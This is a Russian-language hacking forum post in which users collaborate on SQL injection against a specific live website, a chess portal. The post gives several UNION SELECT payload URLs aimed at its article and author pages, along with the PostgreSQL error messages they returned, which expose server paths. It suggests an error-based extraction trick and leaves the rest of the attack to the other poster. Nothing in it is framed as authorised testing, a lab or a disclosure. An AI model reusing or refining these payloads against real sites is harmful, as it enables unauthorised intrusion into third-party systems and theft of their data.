Сообщение от
navigat0r
http://www.e3e5.com/articles.php?section=12&subsection=1&lang=0
у кого что получится, просьба сообщать
oRb, как все скобки закрыть?
Почему-то отрезать лишнее комментарии не получается, но можно и по другому модифицировать запрос.
http://www.e3e5.com/articles.php?section=-12))+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null+from+section s_captions+where+((1=1
Warning: pg_query(): Query failed: ERROR: колонка "ord" не существует in /usr/www/phpe3e5.com/classes/DBHelper.class.php on line 506
подобрать нужную таблицу не удалось. Решил поискать более подходящий инъект. Нашел этот
http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=1
Warning: pg_query(): Query failed: ERROR: ошибка синтаксиса в или рядом ")" at character 314 in /usr/www/phpe3e5.com/classes/DBHelper.class.php on line 403
2 скл запроса =/ Вывод сделать врядли получится. Но можно воспользоваться аналогом "more that 1 row".
http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=(select+1,2)+
Warning: pg_query(): Query failed: ERROR: подзапрос должен вернуть только одну колонку in /usr/www/phpe3e5.com/classes/DBHelper.class.php on line 678
Но это ты уж сам. Удачи
